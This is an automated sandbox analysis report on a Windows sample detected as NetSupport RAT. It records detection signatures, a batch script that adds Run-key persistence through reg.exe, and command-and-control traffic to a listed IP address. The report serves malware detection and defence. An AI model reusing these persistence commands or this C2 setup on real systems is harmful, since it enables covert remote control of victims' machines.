Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Overview

General Information

Sample name:d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
Analysis ID:1580475
MD5:47cfce938a71540a2039aebd5abe0783
SHA1:641d20b31f5b2aba11746d1e533cbe4d4ee9c6ed
SHA256:d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d582b6d0b6f188306954
Tags:exeNetSupportuser-abuse_ch
Infos:

Detection

NetSupport RAT
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to detect sleep reduction / modifications
Contains functionalty to change the wallpaper
Delayed program exit found
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Uses cmd line tools excessively to alter registry or file data
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe (PID: 1100 cmdline: "C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe" MD5: 47CFCE938A71540A2039AEBD5ABE0783)
    • cmd.exe (PID: 6508 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7184 cmdline: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7204 cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • bild.exe (PID: 7216 cmdline: C:\Users\Public\Netstat\bild.exe MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 7388 cmdline: "C:\Users\Public\Netstat\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 7612 cmdline: "C:\Users\Public\Netstat\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • bild.exe (PID: 7688 cmdline: "C:\Users\Public\Netstat\bild.exe" MD5: 8D9709FF7D9C83BD376E01912C734F0A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\Public\Netstat\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\Public\Netstat\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\Public\Netstat\bild.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\Public\Netstat\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\Public\Netstat\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            00000007.00000002.2163282550.0000000000A52000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000007.00000002.2164038607.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000007.00000000.2160770098.0000000000A52000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000009.00000002.2246542222.0000000000A52000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 28 entries
                      SourceRuleDescriptionAuthorStrings
                      10.2.bild.exe.6cee0000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        7.0.bild.exe.a50000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          9.2.bild.exe.a50000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            6.2.bild.exe.a50000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              6.2.bild.exe.6e350000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 30 entries

                                System Summary

                                barindex
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Netstat\bild.exe, CommandLine: C:\Users\Public\Netstat\bild.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Netstat\bild.exe, NewProcessName: C:\Users\Public\Netstat\bild.exe, OriginalFileName: C:\Users\Public\Netstat\bild.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6508, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Netstat\bild.exe, ProcessId: 7216, ProcessName: bild.exe
                                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Netstat\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7184, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 45.76.253.210, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Netstat\bild.exe, Initiated: true, ProcessId: 7216, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7184, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Netstat
                                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6508, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", ProcessId: 7184, ProcessName: reg.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6508, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe", ProcessId: 7184, ProcessName: reg.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Netstat\bild.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7204, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Netstat
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-24T17:47:45.194573+010028277451Malware Command and Control Activity Detected192.168.2.54970445.76.253.210443TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: C:\Users\Public\Netstat\bild.exeReversingLabs: Detection: 28%
                                Source: C:\Users\Public\Netstat\remcmdstub.exeReversingLabs: Detection: 13%
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeReversingLabs: Detection: 57%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,6_2_110AD570
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_110AD570 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,7_2_110AD570
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile opened: C:\Users\Public\Netstat\msvcr100.dllJump to behavior
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                Source: Binary string: msvcr100.i386.pdb source: bild.exe, bild.exe, 00000006.00000002.3900156283.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000007.00000002.2164341754.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000009.00000002.2252286300.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 0000000A.00000002.2326094910.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000006.00000002.3900362528.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000007.00000002.2164541647.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000009.00000002.2252520628.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 0000000A.00000002.2326293538.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000006.00000002.3898223938.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000006.00000000.2053735718.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000007.00000002.2163282550.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000007.00000000.2160770098.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000002.2246542222.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000000.2241928402.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000002.2325321884.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000000.2323620387.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000006.00000002.3900285407.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000007.00000002.2164476357.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000009.00000002.2252435927.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 0000000A.00000002.2326221599.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003CA273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_003CA273
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003DA537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_003DA537
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_003E7D78 FindFirstFileExA,0_2_003E7D78
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D330
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_11065890
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,6_2_1106A0A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_111266E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_1110AFD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102D330
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,7_2_11065890
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,7_2_1106A0A0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,7_2_111266E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 7_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,7_2_1110AFD0

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.5:49704 -> 45.76.253.210:443
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.0.231 104.26.0.231
                                Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.253.210
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.253.210
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.76.253.210
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://45.76.253.210/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.76.253.210Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 16:47:53 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f721366e97243c3-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0nwl0fqpWj9aOs%2B5pPibZUS%2BNlzyyJl7qpE06vFDlziailyOKQLpU2dv5%2BYP2DQjlQ3RQa3dwBfFRWca3zhnIWLKoxmtnNejFhWWn%2Bg8BTapNO5piyQUp14xnyYqc0uXQmOE6fv%2BVSNw7Jct"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1706&rtt_var=853&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Dec 2024 16:47:55 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8f72136feae17d24-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5nXncoeYjwhQke4Ub5QxCvwIOAE79H1YfjGNsnzfxAFE5xSi7t1sixwZM1paGZ1tFBWnIcxivtqRzQBYBELq2GRwcUp%2BurUxYqeRbV0Ft3nu3dUtSF9Rw1N4tI9bMh1LNi5HPvD9eQKu9HxJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=2081&min_rtt=2081&rtt_var=1040&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 